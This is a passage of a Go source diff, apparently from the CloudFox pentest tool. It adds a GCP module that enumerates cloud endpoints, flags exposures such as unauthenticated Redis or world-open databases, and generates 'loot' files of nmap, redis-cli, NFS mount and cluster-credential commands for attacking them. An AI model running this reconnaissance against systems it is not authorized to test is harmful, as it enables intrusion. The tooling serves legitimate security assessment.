+ Resource: user, + ResourceType: "Address", + Region: "global", + Status: addr.Status, + IsExternal: true, + Security: security, + } + m.addEndpoint(projectID, ep) + } + } + return nil + }); err != nil { + gcpinternal.HandleGCPError(err, logger, "endpoints", + fmt.Sprintf("Could not list global addresses in project %s", projectID)) + } + + // Regional addresses - use AggregatedList to avoid needing compute.regions.list permission + addrReq := svc.Addresses.AggregatedList(projectID) + if err := addrReq.Pages(ctx, func(page *compute.AddressAggregatedList) error { + for scopeName, scopedList := range page.Items { + if scopedList.Addresses == nil { + continue + } + // Extract region from scope name (format: "regions/us-central1") + regionName := "unknown" + if strings.HasPrefix(scopeName, "regions/") { + regionName = strings.TrimPrefix(scopeName, "regions/") + } + for _, addr := range scopedList.Addresses { + if addr.AddressType == "EXTERNAL" { + user := "" + if len(addr.Users) > 0 { + user = extractResourceName(addr.Users[0]) + } + security := "" + if user == "" { + security = "Unused" + } + ep := Endpoint{ + ProjectID: projectID, + Name: addr.Name, + Type: "Static IP", + ExternalIP: addr.Address, + Protocol: "TCP/UDP", + Port: "ALL", + Resource: user, + ResourceType: "Address", + Region: regionName, + Status: addr.Status, + IsExternal: true, + Security: security, + } + m.addEndpoint(projectID, ep) + } + } + } + return nil + }); err != nil { + gcpinternal.HandleGCPError(err, logger, "endpoints", + fmt.Sprintf("Could not list regional addresses in project %s", projectID)) + } +} + +// getInstanceIPs retrieves instances with both external and internal IPs +func (m *EndpointsModule) getInstanceIPs(ctx context.Context, svc *compute.Service, projectID string, logger internal.Logger) { + req := svc.Instances.AggregatedList(projectID) + if err := req.Pages(ctx, func(page *compute.InstanceAggregatedList) error { + for zone, scopedList := range page.Items { + if scopedList.Instances == nil { + continue + } + for _, instance := range scopedList.Instances { + zoneName := extractZoneFromScope(zone) + + var serviceAccount string + if len(instance.ServiceAccounts) > 0 { + serviceAccount = instance.ServiceAccounts[0].Email + } + + for _, iface := range instance.NetworkInterfaces { + networkName := extractResourceName(iface.Network) + internalIP := iface.NetworkIP + + // External IP + for _, accessConfig := range iface.AccessConfigs { + if accessConfig.NatIP != "" { + ep := Endpoint{ + ProjectID: projectID, + Name: instance.Name, + Type: "Compute Engine", + ExternalIP: accessConfig.NatIP, + InternalIP: internalIP, + Protocol: "TCP/UDP", + Port: "ALL", + ResourceType: "Instance", + Region: zoneName, + Status: instance.Status, + ServiceAccount: serviceAccount, + IsExternal: true, + Network: networkName, + } + m.addEndpoint(projectID, ep) + } + } + + // Internal only (no external IP) + hasExternalIP := false + for _, accessConfig := range iface.AccessConfigs { + if accessConfig.NatIP != "" { + hasExternalIP = true + break + } + } + if !hasExternalIP && internalIP != "" { + ports := m.getPortsForInstance(networkName, instance.Tags) + ep := Endpoint{ + ProjectID: projectID, + Name: instance.Name, + Type: "Compute Engine", + InternalIP: internalIP, + Protocol: "TCP/UDP", + Port: ports, + ResourceType: "Instance", + Region: zoneName, + Status: instance.Status, + ServiceAccount: serviceAccount, + IsExternal: false, + Network: networkName, + } + m.addEndpoint(projectID, ep) + } + } + } + } + return nil + }); err != nil { + gcpinternal.HandleGCPError(err, logger, "endpoints", + fmt.Sprintf("Could not list instances in project %s", projectID)) + } +} + +// getPortsForInstance determines open ports for an instance based on firewall rules +func (m *EndpointsModule) getPortsForInstance(network string, tags *compute.Tags) string { + var allPorts []string + + if ports, ok := m.firewallPortMap[network]; ok { + allPorts = append(allPorts, ports...) + } + + if tags != nil { + for _, tag := range tags.Items { + key := fmt.Sprintf("%s:%s", network, tag) + if ports, ok := m.firewallPortMap[key]; ok { + allPorts = append(allPorts, ports...) + } + } + } + + if len(allPorts) == 0 { + return "ALL" + } + + portSet := make(map[string]bool) + for _, p := range allPorts { + portSet[p] = true + } + var uniquePorts []string + for p := range portSet { + uniquePorts = append(uniquePorts, p) + } + + return strings.Join(uniquePorts, ",") +} + +// getLoadBalancers retrieves both external and internal load balancers +func (m *EndpointsModule) getLoadBalancers(ctx context.Context, svc *compute.Service, projectID string, logger internal.Logger) { + // Regional forwarding rules + req := svc.ForwardingRules.AggregatedList(projectID) + if err := req.Pages(ctx, func(page *compute.ForwardingRuleAggregatedList) error { + for region, scopedList := range page.Items { + if scopedList.ForwardingRules == nil { + continue + } + for _, rule := range scopedList.ForwardingRules { + ports := "ALL" + if rule.PortRange != "" { + ports = rule.PortRange + } else if len(rule.Ports) > 0 { + ports = strings.Join(rule.Ports, ",") + } + + target := extractResourceName(rule.Target) + if target == "" && rule.BackendService != "" { + target = extractResourceName(rule.BackendService) + } + + isExternal := rule.LoadBalancingScheme == "EXTERNAL" || rule.LoadBalancingScheme == "EXTERNAL_MANAGED" + isInternal := rule.LoadBalancingScheme == "INTERNAL" || rule.LoadBalancingScheme == "INTERNAL_MANAGED" || rule.LoadBalancingScheme == "INTERNAL_SELF_MANAGED" + + lbType := "LoadBalancer" + if isInternal { + lbType = "Internal LB" + } + + if isExternal || isInternal { + tlsEnabled := rule.PortRange == "443" || strings.Contains(strings.ToLower(rule.Name), "https") + security := "" + if isExternal && !tlsEnabled && ports != "443" { + security = "No TLS" + } + + ep := Endpoint{ + ProjectID: projectID, + Name: rule.Name, + Type: lbType, + Protocol: rule.IPProtocol, + Port: ports, + Resource: target, + ResourceType: "ForwardingRule", + Region: extractRegionFromScope(region), + TLSEnabled: tlsEnabled, + IsExternal: isExternal, + Network: extractResourceName(rule.Network), + Security: security, + } + if isExternal { + ep.ExternalIP = rule.IPAddress + } else { + ep.InternalIP = rule.IPAddress + } + m.addEndpoint(projectID, ep) + } + } + } + return nil + }); err != nil { + gcpinternal.HandleGCPError(err, logger, "endpoints", + fmt.Sprintf("Could not list regional forwarding rules in project %s", projectID)) + } + + // Global forwarding rules + globalReq := svc.GlobalForwardingRules.List(projectID) + if err := globalReq.Pages(ctx, func(page *compute.ForwardingRuleList) error { + for _, rule := range page.Items { + if rule.LoadBalancingScheme == "EXTERNAL" || rule.LoadBalancingScheme == "EXTERNAL_MANAGED" { + ports := "ALL" + if rule.PortRange != "" { + ports = rule.PortRange + } + + tlsEnabled := rule.PortRange == "443" || strings.Contains(strings.ToLower(rule.Name), "https") + security := "" + if !tlsEnabled && ports != "443" { + security = "No TLS" + } + + ep := Endpoint{ + ProjectID: projectID, + Name: rule.Name, + Type: "Global LB", + ExternalIP: rule.IPAddress, + Protocol: rule.IPProtocol, + Port: ports, + Resource: extractResourceName(rule.Target), + ResourceType: "GlobalForwardingRule", + Region: "global", + TLSEnabled: tlsEnabled, + IsExternal: true, + Security: security, + } + m.addEndpoint(projectID, ep) + } + } + return nil + }); err != nil { + gcpinternal.HandleGCPError(err, logger, "endpoints", + fmt.Sprintf("Could not list global forwarding rules in project %s", projectID)) + } +} + +// getVPNGateways retrieves VPN gateway external IPs +func (m *EndpointsModule) getVPNGateways(ctx context.Context, svc *compute.Service, projectID string, logger internal.Logger) { + // Classic VPN Gateways + req := svc.TargetVpnGateways.AggregatedList(projectID) + if err := req.Pages(ctx, func(page *compute.TargetVpnGatewayAggregatedList) error { + for region, scopedList := range page.Items { + if scopedList.TargetVpnGateways == nil { + continue + } + for _, gw := range scopedList.TargetVpnGateways { + for i, ip := range gw.ForwardingRules { + ep := Endpoint{ + ProjectID: projectID, + Name: fmt.Sprintf("%s-ip%d", gw.Name, i), + Type: "VPN Gateway", + ExternalIP: extractResourceName(ip), + Protocol: "ESP/UDP", + Port: "500,4500", + ResourceType: "VPNGateway", + Region: extractRegionFromScope(region), + Status: gw.Status, + IsExternal: true, + Network: extractResourceName(gw.Network), + } + m.addEndpoint(projectID, ep) + } + } + } + return nil + }); err != nil { + gcpinternal.HandleGCPError(err, logger, "endpoints", + fmt.Sprintf("Could not list classic VPN gateways in project %s", projectID)) + } + + // HA VPN Gateways + haReq := svc.VpnGateways.AggregatedList(projectID) + if err := haReq.Pages(ctx, func(page *compute.VpnGatewayAggregatedList) error { + for region, scopedList := range page.Items { + if scopedList.VpnGateways == nil { + continue + } + for _, gw := range scopedList.VpnGateways { + for _, iface := range gw.VpnInterfaces { + if iface.IpAddress != "" { + ep := Endpoint{ + ProjectID: projectID, + Name: fmt.Sprintf("%s-if%d", gw.Name, iface.Id), + Type: "HA VPN Gateway", + ExternalIP: iface.IpAddress, + Protocol: "ESP/UDP", + Port: "500,4500", + ResourceType: "HAVPNGateway", + Region: extractRegionFromScope(region), + IsExternal: true, + Network: extractResourceName(gw.Network), + } + m.addEndpoint(projectID, ep) + } + } + } + } + return nil + }); err != nil { + gcpinternal.HandleGCPError(err, logger, "endpoints", + fmt.Sprintf("Could not list HA VPN gateways in project %s", projectID)) + } +} + +// getCloudNAT retrieves Cloud NAT external IPs +func (m *EndpointsModule) getCloudNAT(ctx context.Context, svc *compute.Service, projectID string, logger internal.Logger) { + req := svc.Routers.AggregatedList(projectID) + if err := req.Pages(ctx, func(page *compute.RouterAggregatedList) error { + for region, scopedList := range page.Items { + if scopedList.Routers == nil { + continue + } + for _, router := range scopedList.Routers { + for _, nat := range router.Nats { + for _, ip := range nat.NatIps { + ep := Endpoint{ + ProjectID: projectID, + Name: fmt.Sprintf("%s/%s", router.Name, nat.Name), + Type: "Cloud NAT", + ExternalIP: extractResourceName(ip), + Protocol: "TCP/UDP", + Port: "ALL", + ResourceType: "CloudNAT", + Region: extractRegionFromScope(region), + IsExternal: true, + Network: extractResourceName(router.Network), + } + m.addEndpoint(projectID, ep) + } + } + } + } + return nil + }); err != nil { + gcpinternal.HandleGCPError(err, logger, "endpoints", + fmt.Sprintf("Could not list Cloud NAT routers in project %s", projectID)) + } +} + +// getPrivateServiceConnect retrieves Private Service Connect endpoints +func (m *EndpointsModule) getPrivateServiceConnect(ctx context.Context, svc *compute.Service, projectID string, logger internal.Logger) { + // Service Attachments (producer side) + saReq := svc.ServiceAttachments.AggregatedList(projectID) + if err := saReq.Pages(ctx, func(page *compute.ServiceAttachmentAggregatedList) error { + for region, scopedList := range page.Items { + if scopedList.ServiceAttachments == nil { + continue + } + for _, sa := range scopedList.ServiceAttachments { + ep := Endpoint{ + ProjectID: projectID, + Name: sa.Name, + Type: "PSC Service", + Hostname: sa.SelfLink, + Protocol: "TCP", + Port: "ALL", + ResourceType: "ServiceAttachment", + Region: extractRegionFromScope(region), + IsExternal: false, + } + m.addEndpoint(projectID, ep) + } + } + return nil + }); err != nil { + gcpinternal.HandleGCPError(err, logger, "endpoints", + fmt.Sprintf("Could not list service attachments in project %s", projectID)) + } +} + +// getCloudRunServices retrieves Cloud Run services +func (m *EndpointsModule) getCloudRunServices(ctx context.Context, projectID string, logger internal.Logger) { + runService, err := run.NewService(ctx) + if err != nil { + return + } + + parent := fmt.Sprintf("projects/%s/locations/-", projectID) + resp, err := runService.Projects.Locations.Services.List(parent).Do() + if err != nil { + gcpinternal.HandleGCPError(err, logger, "endpoints", + fmt.Sprintf("Could not list Cloud Run services in project %s", projectID)) + return + } + + for _, service := range resp.Items { + if service.Status != nil && service.Status.Url != "" { + hostname := strings.TrimPrefix(service.Status.Url, "https://") + + ep := Endpoint{ + ProjectID: projectID, + Name: service.Metadata.Name, + Type: "Cloud Run", + Hostname: hostname, + Protocol: "HTTPS", + Port: "443", + ResourceType: "CloudRun", + TLSEnabled: true, + IsExternal: true, + } + + if service.Metadata != nil && service.Metadata.Labels != nil { + if region, ok := service.Metadata.Labels["cloud.googleapis.com/location"]; ok { + ep.Region = region + } + } + + if service.Spec != nil && service.Spec.Template != nil && service.Spec.Template.Spec != nil { + ep.ServiceAccount = service.Spec.Template.Spec.ServiceAccountName + } + + m.addEndpoint(projectID, ep) + } + } +} + +// getCloudFunctions retrieves Cloud Functions with HTTP triggers +func (m *EndpointsModule) getCloudFunctions(ctx context.Context, projectID string, logger internal.Logger) { + fs := functionsservice.New() + functions, err := fs.Functions(projectID) + if err != nil { + gcpinternal.HandleGCPError(err, logger, "endpoints", + fmt.Sprintf("Could not list Cloud Functions in project %s", projectID)) + return + } + + for _, fn := range functions { + if fn.TriggerURL != "" { + hostname := strings.TrimPrefix(fn.TriggerURL, "https://") + security := "" + if fn.IsPublic { + security = "Public (No Auth)" + } + + ep := Endpoint{ + ProjectID: projectID, + Name: fn.Name, + Type: "Cloud Function", + Hostname: hostname, + Protocol: "HTTPS", + Port: "443", + ResourceType: "CloudFunction", + Region: fn.Region, + Status: fn.State, + ServiceAccount: fn.ServiceAccount, + TLSEnabled: true, + IsExternal: true, + Security: security, + } + m.addEndpoint(projectID, ep) + } + } +} + +// getAppEngineServices retrieves App Engine services +func (m *EndpointsModule) getAppEngineServices(ctx context.Context, projectID string, logger internal.Logger) { + aeService, err := appengine.NewService(ctx) + if err != nil { + return + } + + // Get app info + app, err := aeService.Apps.Get(projectID).Do() + if err != nil { + // App Engine not enabled or no app + return + } + + // List services + servicesResp, err := aeService.Apps.Services.List(projectID).Do() + if err != nil { + return + } + + for _, svc := range servicesResp.Services { + // Default service hostname + hostname := fmt.Sprintf("%s.appspot.com", projectID) + if svc.Id != "default" { + hostname = fmt.Sprintf("%s-dot-%s.appspot.com", svc.Id, projectID) + } + + ep := Endpoint{ + ProjectID: projectID, + Name: svc.Id, + Type: "App Engine", + Hostname: hostname, + Protocol: "HTTPS", + Port: "443", + ResourceType: "AppEngine", + Region: app.LocationId, + TLSEnabled: true, + IsExternal: true, + } + m.addEndpoint(projectID, ep) + } +} + +// getGKEClusters retrieves GKE cluster API endpoints +func (m *EndpointsModule) getGKEClusters(ctx context.Context, projectID string, logger internal.Logger) { + gs := gkeservice.New() + clusters, _, err := gs.Clusters(projectID) + if err != nil { + gcpinternal.HandleGCPError(err, logger, "endpoints", + fmt.Sprintf("Could not list GKE clusters in project %s", projectID)) + return + } + + for _, cluster := range clusters { + if cluster.Endpoint != "" { + isExternal := !cluster.PrivateCluster + security := "" + if !cluster.PrivateCluster && !cluster.MasterAuthorizedOnly { + security = "Public API (No Restrictions)" + } else if cluster.MasterAuthorizedOnly { + security = "Authorized Networks Only" + } + + ep := Endpoint{ + ProjectID: projectID, + Name: cluster.Name, + Type: "GKE API", + Protocol: "HTTPS", + Port: "443", + ResourceType: "GKECluster", + Region: cluster.Location, + Status: cluster.Status, + TLSEnabled: true, + IsExternal: isExternal, + Network: cluster.Network, + Security: security, + } + if isExternal { + ep.ExternalIP = cluster.Endpoint + } else { + ep.InternalIP = cluster.Endpoint + } + m.addEndpoint(projectID, ep) + } + } +} + +// getCloudSQLInstances retrieves Cloud SQL instances +func (m *EndpointsModule) getCloudSQLInstances(ctx context.Context, projectID string, logger internal.Logger) { + cs := cloudsqlservice.New() + instances, err := cs.Instances(projectID) + if err != nil { + gcpinternal.HandleGCPError(err, logger, "endpoints", + fmt.Sprintf("Could not list Cloud SQL instances in project %s", projectID)) + return + } + + for _, instance := range instances { + port := "3306" // MySQL default + if strings.Contains(instance.DatabaseVersion, "POSTGRES") { + port = "5432" + } else if strings.Contains(instance.DatabaseVersion, "SQLSERVER") { + port = "1433" + } + + // Public IP + if instance.PublicIP != "" { + security := "" + if !instance.RequireSSL { + security = "SSL Not Required" + } + for _, an := range instance.AuthorizedNetworks { + if an.IsPublic { + security = "Open to 0.0.0.0/0" + break + } + } + + ep := Endpoint{ + ProjectID: projectID, + Name: instance.Name, + Type: "Cloud SQL", + ExternalIP: instance.PublicIP, + InternalIP: instance.PrivateIP, + Protocol: "TCP", + Port: port, + ResourceType: "CloudSQL", + Region: instance.Region, + Status: instance.State, + TLSEnabled: instance.RequireSSL, + IsExternal: true, + Security: security, + } + m.addEndpoint(projectID, ep) + } else if instance.PrivateIP != "" { + // Private IP only + ep := Endpoint{ + ProjectID: projectID, + Name: instance.Name, + Type: "Cloud SQL", + InternalIP: instance.PrivateIP, + Protocol: "TCP", + Port: port, + ResourceType: "CloudSQL", + Region: instance.Region, + Status: instance.State, + TLSEnabled: instance.RequireSSL, + IsExternal: false, + } + m.addEndpoint(projectID, ep) + } + } +} + +// getMemorystoreRedis retrieves Memorystore Redis instances +func (m *EndpointsModule) getMemorystoreRedis(ctx context.Context, projectID string, logger internal.Logger) { + ms := memorystoreservice.New() + instances, err := ms.ListRedisInstances(projectID) + if err != nil { + gcpinternal.HandleGCPError(err, logger, "endpoints", + fmt.Sprintf("Could not list Memorystore Redis instances in project %s", projectID)) + return + } + + for _, instance := range instances { + if instance.Host != "" { + security := "" + if !instance.AuthEnabled { + security = "No Auth" + } + if instance.TransitEncryption == "DISABLED" { + if security != "" { + security += ", " + } + security += "No TLS" + } + + ep := Endpoint{ + ProjectID: projectID, + Name: instance.Name, + Type: "Redis", + InternalIP: instance.Host, + Protocol: "TCP", + Port: fmt.Sprintf("%d", instance.Port), + ResourceType: "Memorystore", + Region: instance.Location, + Status: instance.State, + TLSEnabled: instance.TransitEncryption != "DISABLED", + IsExternal: false, + Network: extractResourceName(instance.AuthorizedNetwork), + Security: security, + } + m.addEndpoint(projectID, ep) + } + } +} + +// getFilestoreInstances retrieves Filestore NFS instances +func (m *EndpointsModule) getFilestoreInstances(ctx context.Context, projectID string, logger internal.Logger) { + fs := filestoreservice.New() + instances, err := fs.ListInstances(projectID) + if err != nil { + gcpinternal.HandleGCPError(err, logger, "endpoints", + fmt.Sprintf("Could not list Filestore instances in project %s", projectID)) + return + } + + for _, instance := range instances { + for _, ip := range instance.IPAddresses { + security := "" + for _, share := range instance.Shares { + for _, opt := range share.NfsExportOptions { + if opt.SquashMode == "NO_ROOT_SQUASH" { + security = "NO_ROOT_SQUASH" + break + } + } + } + + ep := Endpoint{ + ProjectID: projectID, + Name: instance.Name, + Type: "Filestore NFS", + InternalIP: ip, + Protocol: "NFS", + Port: "2049", + ResourceType: "Filestore", + Region: instance.Location, + Status: instance.State, + IsExternal: false, + Network: instance.Network, + Security: security, + } + m.addEndpoint(projectID, ep) + } + } +} + +// getComposerEnvironments retrieves Cloud Composer Airflow web UI URLs +func (m *EndpointsModule) getComposerEnvironments(ctx context.Context, projectID string, logger internal.Logger) { + cs := composerservice.New() + environments, err := cs.ListEnvironments(projectID) + if err != nil { + gcpinternal.HandleGCPError(err, logger, "endpoints", + fmt.Sprintf("Could not list Composer environments in project %s", projectID)) + return + } + + for _, env := range environments { + if env.AirflowURI != "" { + hostname := strings.TrimPrefix(env.AirflowURI, "https://") + security := "" + if !env.PrivateEnvironment { + security = "Public Web UI" + } + for _, ip := range env.WebServerAllowedIPs { + if ip == "0.0.0.0/0" { + security = "Open to 0.0.0.0/0" + break + } + } + + ep := Endpoint{ + ProjectID: projectID, + Name: env.Name, + Type: "Composer Airflow", + Hostname: hostname, + Protocol: "HTTPS", + Port: "443", + ResourceType: "Composer", + Region: env.Location, + Status: env.State, + ServiceAccount: env.ServiceAccount, + TLSEnabled: true, + IsExternal: !env.PrivateEnvironment, + Network: extractResourceName(env.Network), + Security: security, + } + m.addEndpoint(projectID, ep) + } + } +} + +// getDataprocClusters retrieves Dataproc cluster master/worker IPs +func (m *EndpointsModule) getDataprocClusters(ctx context.Context, projectID string, logger internal.Logger) { + ds := dataprocservice.New() + clusters, err := ds.ListClusters(projectID) + if err != nil { + gcpinternal.HandleGCPError(err, logger, "endpoints", + fmt.Sprintf("Could not list Dataproc clusters in project %s", projectID)) + return + } + + for _, cluster := range clusters { + // Master nodes - these are the main SSH/Spark/HDFS entry points + security := "" + if !cluster.InternalIPOnly { + security = "External IPs Enabled" + } + + ep := Endpoint{ + ProjectID: projectID, + Name: cluster.Name + "-master", + Type: "Dataproc Master", + Protocol: "TCP", + Port: "22,8088,9870,8080", + ResourceType: "DataprocCluster", + Region: cluster.Region, + Status: cluster.State, + ServiceAccount: cluster.ServiceAccount, + IsExternal: !cluster.InternalIPOnly, + Network: cluster.Network, + Security: security, + } + m.addEndpoint(projectID, ep) + } +} + +// getNotebookInstances retrieves Vertex AI Notebook instances +func (m *EndpointsModule) getNotebookInstances(ctx context.Context, projectID string, logger internal.Logger) { + ns := notebooksservice.New() + instances, err := ns.ListInstances(projectID) + if err != nil { + gcpinternal.HandleGCPError(err, logger, "endpoints", + fmt.Sprintf("Could not list Notebook instances in project %s", projectID)) + return + } + + for _, instance := range instances { + if instance.ProxyUri != "" { + hostname := strings.TrimPrefix(instance.ProxyUri, "https://") + security := "" + if !instance.NoPublicIP { + security = "Public IP Enabled" + } + if instance.NoProxyAccess { + security = "Proxy Access Disabled" + } + + ep := Endpoint{ + ProjectID: projectID, + Name: instance.Name, + Type: "Vertex AI Notebook", + Hostname: hostname, + Protocol: "HTTPS", + Port: "443", + ResourceType: "Notebook", + Region: instance.Location, + Status: instance.State, + ServiceAccount: instance.ServiceAccount, + TLSEnabled: true, + IsExternal: !instance.NoPublicIP, + Network: instance.Network, + Security: security, + } + m.addEndpoint(projectID, ep) + } + } +} + +// getPubSubPushEndpoints retrieves Pub/Sub push subscription endpoints +func (m *EndpointsModule) getPubSubPushEndpoints(ctx context.Context, projectID string, logger internal.Logger) { + ps := pubsubservice.New() + subscriptions, err := ps.Subscriptions(projectID) + if err != nil { + gcpinternal.HandleGCPError(err, logger, "endpoints", + fmt.Sprintf("Could not list Pub/Sub subscriptions in project %s", projectID)) + return + } + + for _, sub := range subscriptions { + if sub.PushEndpoint != "" { + hostname := sub.PushEndpoint + hostname = strings.TrimPrefix(hostname, "https://") + hostname = strings.TrimPrefix(hostname, "http://") + if idx := strings.Index(hostname, "/"); idx != -1 { + hostname = hostname[:idx] + } + + ep := Endpoint{ + ProjectID: projectID, + Name: sub.Name, + Type: "Pub/Sub Push", + Hostname: hostname, + Protocol: "HTTPS", + Port: "443", + Resource: sub.Topic, + ResourceType: "PubSubSubscription", + ServiceAccount: sub.PushServiceAccount, + TLSEnabled: strings.HasPrefix(sub.PushEndpoint, "https://"), + IsExternal: true, + } + m.addEndpoint(projectID, ep) + } + } +} + +// analyzeFirewallRules analyzes firewall rules and builds port mapping +func (m *EndpointsModule) analyzeFirewallRules(ctx context.Context, svc *compute.Service, projectID string, logger internal.Logger) { + req := svc.Firewalls.List(projectID) + if err := req.Pages(ctx, func(page *compute.FirewallList) error { + for _, fw := range page.Items { + if fw.Direction != "INGRESS" { + continue + } + + networkName := extractResourceName(fw.Network) + + var rulePorts []string + for _, allowed := range fw.Allowed { + if len(allowed.Ports) == 0 { + rulePorts = append(rulePorts, "ALL") + } else { + rulePorts = append(rulePorts, allowed.Ports...) + } + } + + m.mu.Lock() + if len(fw.TargetTags) == 0 { + m.firewallPortMap[networkName] = append(m.firewallPortMap[networkName], rulePorts...) + } else { + for _, tag := range fw.TargetTags { + key := fmt.Sprintf("%s:%s", networkName, tag) + m.firewallPortMap[key] = append(m.firewallPortMap[key], rulePorts...) + } + } + m.mu.Unlock() + } + return nil + }); err != nil { + gcpinternal.HandleGCPError(err, logger, "endpoints", + fmt.Sprintf("Could not list firewall rules in project %s", projectID)) + } +} + +// addEndpoint adds an endpoint thread-safely +func (m *EndpointsModule) addEndpoint(projectID string, ep Endpoint) { + m.mu.Lock() + m.ProjectEndpoints[projectID] = append(m.ProjectEndpoints[projectID], ep) + m.mu.Unlock() +} + +// ------------------------------ +// Helper Functions +// ------------------------------ +func extractResourceName(url string) string { + if url == "" { + return "" + } + parts := strings.Split(url, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return url +} + +func extractRegionFromScope(scope string) string { + parts := strings.Split(scope, "/") + if len(parts) >= 2 { + return parts[len(parts)-1] + } + return scope +} + +func extractZoneFromScope(scope string) string { + parts := strings.Split(scope, "/") + if len(parts) >= 2 { + return parts[len(parts)-1] + } + return scope +} + +// ------------------------------ +// Loot File Management +// ------------------------------ + +// generateLootFiles creates the loot files for a project, grouped by network/region +func (m *EndpointsModule) generateLootFiles(projectID string) []internal.LootFile { + endpoints, ok := m.ProjectEndpoints[projectID] + if !ok || len(endpoints) == 0 { + return nil + } + + // Separate external and internal endpoints + var externalEndpoints, internalEndpoints []Endpoint + for _, ep := range endpoints { + if ep.IsExternal { + externalEndpoints = append(externalEndpoints, ep) + } else { + internalEndpoints = append(internalEndpoints, ep) + } + } + + var lootFiles []internal.LootFile + + // Generate external commands file + if len(externalEndpoints) > 0 { + lootFiles = append(lootFiles, internal.LootFile{ + Name: "endpoints-external-commands", + Contents: m.generateGroupedCommands(externalEndpoints, true), + }) + } + + // Generate internal commands file + if len(internalEndpoints) > 0 { + lootFiles = append(lootFiles, internal.LootFile{ + Name: "endpoints-internal-commands", + Contents: m.generateGroupedCommands(internalEndpoints, false), + }) + } + + return lootFiles +} + +// generateGroupedCommands creates commands grouped by network +func (m *EndpointsModule) generateGroupedCommands(endpoints []Endpoint, isExternal bool) string { + var contents strings.Builder + + if isExternal { + contents.WriteString("# External Endpoint Scan Commands\n") + contents.WriteString("# Generated by CloudFox\n") + contents.WriteString("# These endpoints are internet-facing\n\n") + } else { + contents.WriteString("# Internal Endpoint Scan Commands\n") + contents.WriteString("# Generated by CloudFox\n") + contents.WriteString("# These endpoints require internal network access (VPN, bastion, etc.)\n\n") + } + + // Group endpoints by network (same VPC = same firewall rules) + groups := make(map[string][]Endpoint) + var groupOrder []string + + for _, ep := range endpoints { + network := ep.Network + if network == "" { + network = "default" + } + if _, exists := groups[network]; !exists { + groupOrder = append(groupOrder, network) + } + groups[network] = append(groups[network], ep) + } + + // Generate commands for each network group + for _, network := range groupOrder { + groupEndpoints := groups[network] + + contents.WriteString(fmt.Sprintf("# =============================================================================\n")) + contents.WriteString(fmt.Sprintf("# Network: %s\n", network)) + contents.WriteString(fmt.Sprintf("# =============================================================================\n\n")) + + // Generate commands for each endpoint in the group + for _, ep := range groupEndpoints { + m.writeEndpointCommand(&contents, ep) + } + } + + return contents.String() +} + +// writeEndpointCommand writes the command for a single endpoint +func (m *EndpointsModule) writeEndpointCommand(contents *strings.Builder, ep Endpoint) { + // Determine best target for scanning + target := ep.ExternalIP + if target == "" { + target = ep.InternalIP + } + if target == "" { + target = ep.Hostname + } + if target == "" { + return + } + + // Write endpoint header (just type and name) + contents.WriteString(fmt.Sprintf("# %s: %s\n", ep.Type, ep.Name)) + + // Generate appropriate commands based on type + switch ep.Type { + case "Cloud Run", "Cloud Function", "Composer Airflow", "App Engine", "Vertex AI Notebook": + if ep.Hostname != "" { + contents.WriteString(fmt.Sprintf("curl -v https://%s\n\n", ep.Hostname)) + } + case "GKE API": + contents.WriteString(fmt.Sprintf("gcloud container clusters get-credentials %s --region=%s --project=%s\n", ep.Name, ep.Region, ep.ProjectID)) + contents.WriteString("kubectl cluster-info\n\n") + case "Cloud SQL": + protocol := "mysql" + if strings.Contains(ep.Port, "5432") { + protocol = "psql" + } else if strings.Contains(ep.Port, "1433") { + protocol = "sqlcmd" + } + contents.WriteString(fmt.Sprintf("# %s -h %s -P %s -u USERNAME\n", protocol, target, ep.Port)) + contents.WriteString(fmt.Sprintf("nmap -sV -Pn -p %s %s\n\n", ep.Port, target)) + case "Redis": + contents.WriteString(fmt.Sprintf("redis-cli -h %s -p %s\n", target, ep.Port)) + contents.WriteString(fmt.Sprintf("nmap -sV -Pn -p %s %s\n\n", ep.Port, target)) + case "Filestore NFS": + contents.WriteString(fmt.Sprintf("showmount -e %s\n", target)) + contents.WriteString(fmt.Sprintf("sudo mount -t nfs %s:/ /mnt/\n\n", target)) + case "Dataproc Master": + contents.WriteString(fmt.Sprintf("gcloud compute ssh %s --project=%s --zone=\n", strings.TrimSuffix(ep.Name, "-master"), ep.ProjectID)) + contents.WriteString("# Web UIs: YARN (8088), HDFS (9870), Spark (8080)\n\n") + case "VPN Gateway", "HA VPN Gateway": + contents.WriteString(fmt.Sprintf("# VPN Gateway IP: %s (ports 500/UDP, 4500/UDP, ESP)\n", target)) + contents.WriteString(fmt.Sprintf("nmap -sU -Pn -p 500,4500 %s\n\n", target)) + case "Pub/Sub Push": + contents.WriteString(fmt.Sprintf("curl -v https://%s\n\n", ep.Hostname)) + default: + if ep.Port == "ALL" || ep.Port == "" { + contents.WriteString(fmt.Sprintf("nmap -sV -Pn %s\n", target)) + } else { + contents.WriteString(fmt.Sprintf("nmap -sV -Pn -p %s %s\n", ep.Port, target)) + } + if ep.TLSEnabled || ep.Port == "443" { + contents.WriteString(fmt.Sprintf("curl -vk https://%s/\n", target)) + } + contents.WriteString("\n") + } +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *EndpointsModule) writeOutput(ctx context.Context, logger internal.Logger) { + if m.Hierarchy != nil && !m.FlatOutput { + m.writeHierarchicalOutput(ctx, logger) + } else { + m.writeFlatOutput(ctx, logger) + } +} + +func (m *EndpointsModule) getHeader() []string { + return []string{ + "Project", + "Name", + "Type", + "Exposure", + "External IP", + "Internal IP", + "Hostname", + "Protocol", + "Port", + "Region", + "Network", + "Security", + "Status", + } +} + +func (m *EndpointsModule) endpointsToTableBody(endpoints []Endpoint) [][]string { + var body [][]string + for _, ep := range endpoints { + exposure := "Internal" + if ep.IsExternal { + exposure = "External" + } + + externalIP := ep.ExternalIP + if externalIP == "" { + externalIP = "-" + } + + internalIP := ep.InternalIP + if internalIP == "" { + internalIP = "-" + } + + hostname := ep.Hostname + if hostname == "" { + hostname = "-" + } + + security := ep.Security + if security == "" { + security = "-" + } + + status := ep.Status + if status == "" { + status = "-" + } + + network := ep.Network + if network == "" { + network = "-" + } + + body = append(body, []string{ + m.GetProjectName(ep.ProjectID), + ep.Name, + ep.Type, + exposure, + externalIP, + internalIP, + hostname, + ep.Protocol, + ep.Port, + ep.Region, + network, + security, + status, + }) + } + return body +} + +func (m *EndpointsModule) buildTablesForProject(projectID string) []internal.TableFile { + var tableFiles []internal.TableFile + + if endpoints, ok := m.ProjectEndpoints[projectID]; ok && len(endpoints) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: "endpoints", + Header: m.getHeader(), + Body: m.endpointsToTableBody(endpoints), + }) + } + + return tableFiles +} + +func (m 